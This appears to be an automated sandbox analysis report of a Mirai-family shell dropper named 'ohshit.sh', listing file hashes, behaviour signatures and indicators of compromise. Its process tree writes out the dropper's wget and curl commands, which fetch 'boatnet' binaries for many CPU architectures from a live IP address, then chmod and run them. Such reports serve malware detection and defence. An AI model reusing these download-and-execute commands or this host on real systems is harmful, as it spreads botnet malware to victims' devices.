Analysis
-
max time kernel
149s -
max time network
140s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
30-12-2024 16:43
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
7e24e03c8d6c1bafbc85a32aa065853f
-
SHA1
1399f7b9e79afa7fb910eb61f8e7d10b36c64310
-
SHA256
938aa70dc932c5e04d7b26226591bfa9c18180421958613bac79c72fbcd3145c
-
SHA512
0975c2aaae90e309467a37d38bdb48790c56c7efdfe9ad82a69c93d8cd2d25f4eee4e741222b1d455e04913e69380d52f81efe6c1b025e9ef1fd872a0fcac521
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 897 chmod 735 chmod 756 chmod 791 chmod 822 chmod 841 chmod 750 chmod 828 chmod 885 chmod 865 chmod 742 chmod 772 chmod 815 chmod 879 chmod 891 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 737 WTF /tmp/WTF 743 WTF /tmp/WTF 751 WTF /tmp/WTF 757 WTF /tmp/WTF 774 WTF /tmp/WTF 792 WTF /tmp/WTF 816 WTF /tmp/WTF 823 WTF /tmp/WTF 829 WTF /tmp/WTF 842 WTF /tmp/WTF 866 WTF /tmp/WTF 880 WTF /tmp/WTF 886 WTF /tmp/WTF 892 WTF /tmp/WTF 898 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-4.dat upx -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/706/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/819/cmdline WTF File opened for reading /proc/888/cmdline WTF File opened for reading /proc/775/cmdline WTF File opened for reading /proc/894/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/468/cmdline WTF File opened for reading /proc/675/cmdline WTF File opened for reading /proc/777/cmdline WTF File opened for reading /proc/820/cmdline WTF File opened for reading /proc/794/cmdline WTF File opened for reading /proc/875/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/668/cmdline WTF File opened for reading /proc/793/cmdline WTF File opened for reading /proc/812/cmdline WTF File opened for reading /proc/831/cmdline WTF File opened for reading /proc/855/cmdline WTF File opened for reading /proc/874/cmdline WTF File opened for reading /proc/704/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/826/cmdline WTF File opened for reading /proc/712/cmdline WTF File opened for reading /proc/760/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/677/cmdline WTF File opened for reading /proc/804/cmdline WTF File opened for reading /proc/868/cmdline WTF File opened for reading /proc/889/cmdline WTF File opened for reading /proc/732/cmdline WTF File opened for reading /proc/832/cmdline WTF File opened for reading /proc/856/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/754/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/673/cmdline WTF File opened for reading /proc/702/cmdline WTF File opened for reading /proc/703/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/835/cmdline WTF File opened for reading /proc/746/cmdline WTF File opened for reading /proc/758/cmdline WTF File opened for reading /proc/676/cmdline WTF File opened for reading /proc/697/cmdline WTF File opened for reading /proc/708/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/698/cmdline WTF File opened for reading /proc/799/cmdline WTF File opened for reading /proc/825/cmdline WTF File opened for reading /proc/836/cmdline WTF File opened for reading /proc/854/cmdline WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 741 cat 739 wget 740 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.arm curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:706 -
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:710
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/catcat boatnet.x862⤵PID:734
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-e58699098b194209aee7a8341b931625-systemd-timedated.service-b2Zh7U WTF2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:737
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-e58699098b194209aee7a8341b931625-systemd-timedated.service-b2Zh7U WTF2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:743
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:747
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/catcat boatnet.arc2⤵PID:749
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-e58699098b194209aee7a8341b931625-systemd-timedated.service-b2Zh7U WTF2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:751
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.i4682⤵PID:753
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/catcat boatnet.i4682⤵PID:755
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-e58699098b194209aee7a8341b931625-systemd-timedated.service-b2Zh7U WTF2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.i6862⤵PID:758
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/catcat boatnet.i6862⤵PID:770
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-e58699098b194209aee7a8341b931625-systemd-timedated.service-b2Zh7U WTF2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:774
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.x86_642⤵PID:775
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/catcat boatnet.x86_642⤵PID:789
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-e58699098b194209aee7a8341b931625-systemd-timedated.service-b2Zh7U WTF2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:792
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:794
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/catcat boatnet.mpsl2⤵PID:814
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-e58699098b194209aee7a8341b931625-systemd-timedated.service-b2Zh7U WTF2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:816
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/catcat boatnet.arm2⤵PID:821
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-e58699098b194209aee7a8341b931625-systemd-timedated.service-b2Zh7U WTF2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:823
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:825
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/catcat boatnet.arm52⤵PID:827
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-e58699098b194209aee7a8341b931625-systemd-timedated.service-b2Zh7U WTF2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:829
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:831
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/catcat boatnet.arm62⤵PID:840
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:842
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:845
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/catcat boatnet.arm72⤵PID:863
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:866
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:868
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/catcat boatnet.ppc2⤵PID:878
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:880
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:882
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/catcat boatnet.spc2⤵PID:884
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:886
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:888
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/catcat boatnet.m68k2⤵PID:890
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:892
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:894
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/catcat boatnet.sh42⤵PID:896
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:898
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD52af268efed968357e391ab576fc973c4
SHA190d2eb946f39110a1a1768de197d5b2592c32906
SHA2566f4b2ca72110e08f4a14ccfe634cfe7296914e8e8c65e4de037d3c85f40101ae
SHA512753e6159a6085f846ad7bc6cddf5d0eae592351ada2b344fdbd8c0ce2b6981746b579085f373634adcbd29668cf9ce1979fa7a5f58f05f5bbee6f5405e52c4f1
-
Filesize
105KB
MD5020cb00eb1f2f8f09e6cf30dd27bb1c6
SHA19a744d247de056b9fdad94358b106082724b25c7
SHA2568c4ddaa55221339a69d91cca9c22f1018306bd2bdd721c6b0564d7308d41ca7d
SHA51282c32f182f8547660168ef76f82e00b4029da2604b67a6b463578cdbd925faf906ef1973bd1607d3216d8f39d2c2bf625acb738c7017852223602e1455872810
-
Filesize
220B
MD5f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1750274b02d5f5b00026a4f55b020f4285c693533
SHA256219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA51236bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259
-
Filesize
220B
MD5a8f502a6fb3b7b940e922c951d9e493a
SHA1fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338
-
Filesize
71KB
MD5737731332e0656b2f2714ce6634df996
SHA14d42df96482bff8f3246a47b07fd4c22e1d4c1e5
SHA25622941552b719d5677c0ecc7d2f0322ba915396b1f081045a99d898a1bbf2b02b
SHA512dd68463db50b06b913da04526b8e50f66c0d5d11a020a249c888edd8cd877fa24de2f3c879b9b6c0584aed47d17e3a9106bb5e473166b2c53b85017d6631d71a
-
Filesize
28KB
MD5d2610e796559edd586be4f3cfea659da
SHA167ac4e25ed9856b839f2b11c32e758766a140e23
SHA25675754fcc1c6ecbdee1bc04eb2e4a986d6fb12a63e8a6b663a012ff41b031aef6
SHA512910228016a57f6c76fcf29e7bd0a4d79a6772cda30489b99d9a10b92a00f56fc6829b35460ee09bc99c9fa7dc9607763dd01f39c0730c9975988c595c58bdf7a